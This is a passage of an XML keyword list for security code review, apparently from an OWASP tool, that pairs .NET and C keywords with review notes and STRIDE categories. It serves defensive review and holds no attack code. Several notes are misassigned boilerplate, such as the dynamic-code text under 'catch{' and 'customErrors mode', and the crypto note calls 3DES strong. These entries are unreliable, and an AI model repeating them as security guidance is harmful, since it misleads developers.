<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpOnly</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionality as this has a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.NET.Cookie</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionality as this has a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frame security</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;iframe security</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.htmlcontrols.htmlinputhidden</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.textbox</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.listbox</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.checkboxlist</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.dropdownlist</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>requestEncoding</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>responseEncoding</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>trace</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>authorization</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CustomErrors</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>httpRuntime</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>maxRequestLength</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>forms protection</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>appSettings</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Insert</k_name>
<k_level>2</k_level>
<k_description>It is recommended not to use this function directly in code. If used in client-side code it could be fatal to database integrity.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ValidateRequest</k_name>
<k_level>2</k_level>
<k_description>Not validating all input data against a list of potentially dangerous values could be fatal; it is recommended to use the built-in security features of the framework. Logging this can also be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine whether any sensitive information is being logged. Common mistakes are logging the userID in conjunction with passwords within the authentication functionality, or logging database requests which may contain sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ObjectInputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>pipedinputstream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>objectstream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one&apos;s application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>strcpy</k_name>
<k_level>2</k_level>
<k_description>Watch out for legacy method calls.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>printf</k_name>
<k_level>2</k_level>
<k_description>Watch out for legacy method calls.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>deny</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>credentials</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>identity impersonate</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>timeout</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config contains information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Application_OnAuthenticateRequest</k_name>
<k_level>2</k_level>
<k_description>Each application has its own global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Application_OnAuthorizeRequest</k_name>
<k_level>2</k_level>
<k_description>Each application has its own global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Session_OnStart</k_name>
<k_level>2</k_level>
<k_description>Each application has its own global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Session_OnEnd</k_name>
<k_level>2</k_level>
<k_description>Each application has its own global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4net</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine whether any sensitive information is being logged. Common mistakes are logging the userID in conjunction with passwords within the authentication functionality, or logging database requests which may contain sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostics.Debug</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine whether any sensitive information is being logged. Common mistakes are logging the userID in conjunction with passwords within the authentication functionality, or logging database requests which may contain sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostics.Trace</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine whether any sensitive information is being logged. Common mistakes are logging the userID in conjunction with passwords within the authentication functionality, or logging database requests which may contain sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Thread</k_name>
<k_level>2</k_level>
<k_description>Locating code that contains multithreaded functions. Concurrency issues can result in race conditions which may result in security vulnerabilities. The Thread keyword is where new Thread objects are created. Code that uses static global variables which hold sensitive security information may cause session issues. Code that uses static constructors may also cause issues between threads. Not synchronizing the Dispose method may cause issues if a number of threads call Dispose at the same time; this may cause resource release issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Dispose</k_name>
<k_level>2</k_level>
<k_description>Locating code that contains multithreaded functions. Concurrency issues can result in race conditions, which may result in security vulnerabilities. The Thread keyword is where new thread objects are created. Code that uses static global variables which hold sensitive security information may cause session issues. Code that uses static constructors may also cause issues between threads. Not synchronizing the Dispose method may cause issues if a number of threads call Dispose at the same time; this may cause resource release issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Public</k_name>
<k_level>1</k_level>
<k_description>Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure all class fields are public for a reason. Don&apos;t expose anything you do not need to.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Sealed</k_name>
<k_level>2</k_level>
<k_description>Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure all class fields are public for a reason. Don&apos;t expose anything you do not need to.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Serializable</k_name>
<k_level>2</k_level>
<k_description>The main disadvantage of serialization from a security perspective is that it can cause resource overhead on CPU and I/O devices, and it is a comparatively slow communication technology. XML serialisation is insecure, occupies a lot of space on disk, in memory and in the database, and has the limitation of being accessible from publicly declared classes only.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>AllowPartiallyTrustedCallersAttribute</k_name>
<k_level>2</k_level>
<k_description>It is recommended to check your defined classes for any security vulnerability; if done so, then check the permissions of each caller in the stack. If ANY of those callers do not have the required permission, this is a SecurityException that needs to be managed or removed. To put it more simply: by default an ASP.NET web application that is running in a partial trust scenario cannot call a strongly named assembly; the only way to call an assembly with a strong name is if the strong-named assembly is marked with the AllowPartiallyTrustedCallersAttribute (APTCA).</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetObjectData</k_name>
<k_level>2</k_level>
<k_description>The GetObjectData function is used to serialize the object, and the specialized constructor is used to deserialize the object. The constructor and GetObjectData are passed the same parameters: an instance of the SerializationInfo class and an instance of the StreamingContext structure. Code that calls GetObjectData requires the SecurityPermission for providing serialization services. Associated enumeration: SecurityPermissionFlag.SerializationFormatter.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StrongNameIdentityPermission</k_name>
<k_level>2</k_level>
<k_description>Identity permissions help protect code from unauthorized access. The runtime grants identity permissions when the assembly is loaded, based on the evidence that is provided. This means link demands using StrongNameIdentityPermissionAttribute succeed only if the immediate caller has the correct evidence.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StrongNameIdentity</k_name>
<k_level>2</k_level>
<k_description>The CLR (common language runtime) validates the identity of the assembly provided to it by the loader or host. The host can be a server host (ASP.NET) or a shell host (command line). This identity, also called the Evidence, can be a strong name (StrongNameIdentityPermission), the originating zone, that is Intranet, Internet or Trusted site (ZoneIdentityPermission), the publisher&apos;s digital signature (PublisherIdentityPermission), the originating URL (URLIdentityPermission) or the originating web site (WebSiteIdentityPermission). Here, in this case, one of the attributes is missing or misconfigured.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>catch{</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Finally</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>trace enabled</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>customErrors mode</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>xor</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>DES</k_name>
<k_level>1</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>RNGCryptoServiceProvider</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used, is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
